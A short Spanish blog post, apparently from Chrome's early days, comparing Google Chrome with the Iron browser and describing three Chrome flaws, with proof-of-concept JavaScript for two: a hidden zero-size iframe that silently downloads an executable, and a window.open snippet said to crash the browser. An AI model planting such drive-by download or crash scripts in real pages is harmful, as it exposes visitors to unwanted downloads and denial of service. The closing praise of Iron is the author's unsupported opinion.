Chrome VS Iron
Guau el nuevo navegador de Google eso es lo que penso muchísima gente cuando Google dio a conocer su navegador.
Aunque no se tardó mucho en ver las vulnerabilidades que tenía.
Empezaremos por la primera,
Utilizando un simple “:%” ya podíamos bloquear TODAS las pestañas en el chrome y eso que decían que cada pestaña era independiente de la otra.
Si queremos ver una prueba de concepto podemos clicar aquí con Chrome claro.
La segunda vulnerabilidad es que puedes descargar archivos sin confirmación del usuario con un simple código Javascript como este:
<script>
document.write(’<iframe src=”http://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7B723E6246-B9BB-0330-F224-A9BF72F41C78%7D%26lang%3Des%26browser%3D3%26usagestats%3D1%26appname%3DGoogle%2520Chrome%26needsadmin%3Dfalse%26appguid%3D%7B00058422-BABE-4310-9B8B-B8DEB5D0B68A%7D%26appname%3DChromeGears%26needsadmin%3Dfalse/update2/installers/ChromeSetup.exe” frameborder=”0″ width=”0″ height=”0″>’);
</script>
Este Scrip normalmente en Firefox preguntaría si queremos descargarlo en Chrome se habría descargado ya.
Descargar un archivo de CUALQUIER página de Internet que contuviera este Script. Me parece peligroso
Y la tercera vulenrabilidad de la que me acabado de enterar es que en cualquier página poniendo este código habría un desbordamiento de la memoria.
<script language=”javascript”>
window.open(”\r\n\r\n”);
window.refresh();
window.open(”\r\n\r\n”);
</script>
Entonces es cuando me entero por kriptopolis y Sigt que una empresa alemana ha cogido el Source de Google Chrome y a sacado una version mucho mas segura y sin ese tipo de fallos. Es mas privado es mas seguro no dejés de probarlo.
Link de descarga
